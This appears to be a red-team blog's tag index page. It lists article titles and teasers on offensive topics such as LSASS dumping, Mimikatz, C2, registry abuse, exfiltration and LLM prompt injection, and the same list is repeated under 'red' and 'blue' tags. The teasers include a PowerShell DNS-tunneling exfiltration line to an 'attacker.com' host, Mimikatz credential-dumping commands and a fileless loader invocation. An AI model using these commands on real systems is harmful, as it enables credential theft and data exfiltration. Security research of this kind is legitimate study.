Tag red

Top C&C Methods(RTC0023)

C2C Methods

Awesome Cobalt BoF(RTC0022)

What is a BOF?

Top 60 Compression Methods(RTC0021)

Compression Methods

Event Codes for fun & profit(RTC0020)

Event Codes for fun & profit

Top 50 Techniques & Procedures(RTC0019)

Top 50 Techniques & Procedures

Registry Attack Vectors(RTC0018)

The Windows Registry is a centralized configuration system that stores information necessary to configure the system for one or more users, applications, and hardware devices. The data is stored in...

Abuse SVCHost Methods(RTC0017)

svchost.exe, which stands for “Service Host”, is an integral part of the Windows operating system. It’s a generic host process name for services that run from dynamic-link libraries (DLLs). Instead...

Top 50 Vulnerabilities Leading to RCE in Public-Facing Applications(RTC0016)

Top 50 Vulnerabilities Leading to RCE in Public-Facing Applications

File Binding Methods(RTC0015)

ID Conversion Idea Flow (High-Level Steps) 1 .exe to .zip (Self-extracting archive) Create a self-extracting archive from the executable. 2 .exe to .jar (Java Archive) Create a JAR file containing...

Exfiltration Method for Channels(RTC0014)

DNS Tunneling [System.Net.Dns]::GetHostAddresses(“SensitiveData.attacker.com”) ForEach-Object { $_.ToString() }

Methods for Stealing Password in Browser(RTC0013)

Important Tables and Columns

Kevin Mitnick Lessons(RTC0012)

Pretexting

25 Methods for Pipeline Attacks(RTC0011)

Add Approver using Admin permission on CI

100 Methods for Container Attacks(RTC0010)

Insecure Container Images

Awesome Maltego Transforms(RTC0008)

Cover by: Andreas Rocha

60 Methods For Cloud Attacks(RTC0009)

Insecure Interfaces and APIs

Satellite Hacking Demystified(RTC0007)

ADCS (Attitude Determination and Control System)

Finding 0-day vulnerabilities in apps using the Red Team approach(RTC0005)

Apache Log4j2 Deserialization of Untrusted Data

Hacking Methods In Films(RTF0001)

COD Ghost

Large Language Model Prompts(RTC0006)

LLM01:2023 - Prompt Injections

64 Methods For Execute Mimikatz(RTC0003)

64 Methods for Execute Mimikatz

50 Methods For Lsass Dump(RTC0002)

Mimikatz Methods: Sekurlsa::logonpasswords Sekurlsa::minidump lsadump::dcsync

Potato(RTR0003)

Potato code:RTR0003

Email(RTR0002)

Email code:RTR0002

OpenDocker(RTR0001)

Open Docker code:RTR0001

Hello RedTeamer

Hello RedTeamer

Methods For Fileless Execution(RTC0004)

PE Loader 1 FilelessPELoader.exe 192.168.126.240 8080 cipher. bin key. bin https://github.com/TheD1rkMtr/FilelessPELoader

Tag blue

Top C&C Methods(RTC0023)

C2C Methods

Awesome Cobalt BoF(RTC0022)

What is a BOF?

Top 60 Compression Methods(RTC0021)

Compression Methods

Event Codes for fun & profit(RTC0020)

Event Codes for fun & profit

Top 50 Techniques & Procedures(RTC0019)

Top 50 Techniques & Procedures

Registry Attack Vectors(RTC0018)

The Windows Registry is a centralized configuration system that stores information necessary to configure the system for one or more users, applications, and hardware devices. The data is stored in...

Abuse SVCHost Methods(RTC0017)

svchost.exe, which stands for “Service Host”, is an integral part of the Windows operating system. It’s a generic host process name for services that run from dynamic-link libraries (DLLs). Instead...

Top 50 Vulnerabilities Leading to RCE in Public-Facing Applications(RTC0016)

Top 50 Vulnerabilities Leading to RCE in Public-Facing Applications

File Binding Methods(RTC0015)

ID Conversion Idea Flow (High-Level Steps) 1 .exe to .zip (Self-extracting archive) Create a self-extracting archive from the executable. 2 .exe to .jar (Java Archive) Create a JAR file containing...

Exfiltration Method for Channels(RTC0014)

DNS Tunneling [System.Net.Dns]::GetHostAddresses(“SensitiveData.attacker.com”) ForEach-Object { $_.ToString() }

Methods for Stealing Password in Browser(RTC0013)

Important Tables and Columns

Kevin Mitnick Lessons(RTC0012)

Pretexting

25 Methods for Pipeline Attacks(RTC0011)

Add Approver using Admin permission on CI

100 Methods for Container Attacks(RTC0010)

Insecure Container Images

Awesome Maltego Transforms(RTC0008)

Cover by: Andreas Rocha

60 Methods For Cloud Attacks(RTC0009)

Insecure Interfaces and APIs

Satellite Hacking Demystified(RTC0007)

ADCS (Attitude Determination and Control System)

Finding 0-day vulnerabilities in apps using the Red Team approach(RTC0005)

Apache Log4j2 Deserialization of Untrusted Data

Hacking Methods In Films(RTF0001)

COD Ghost

Large Language Model Prompts(RTC0006)

LLM01:2023 - Prompt Injections

64 Methods For Execute Mimikatz(RTC0003)

64 Methods for Execute Mimikatz

50 Methods For Lsass Dump(RTC0002)

Mimikatz Methods: Sekurlsa::logonpasswords Sekurlsa::minidump lsadump::dcsync

Potato(RTR0003)

Potato code:RTR0003

Email(RTR0002)

Email code:RTR0002

OpenDocker(RTR0001)

Open Docker code:RTR0001

Hello RedTeamer

Hello RedTeamer

Methods For Fileless Execution(RTC0004)

PE Loader 1 FilelessPELoader.exe 192.168.126.240 8080 cipher. bin key. bin https://github.com/TheD1rkMtr/FilelessPELoader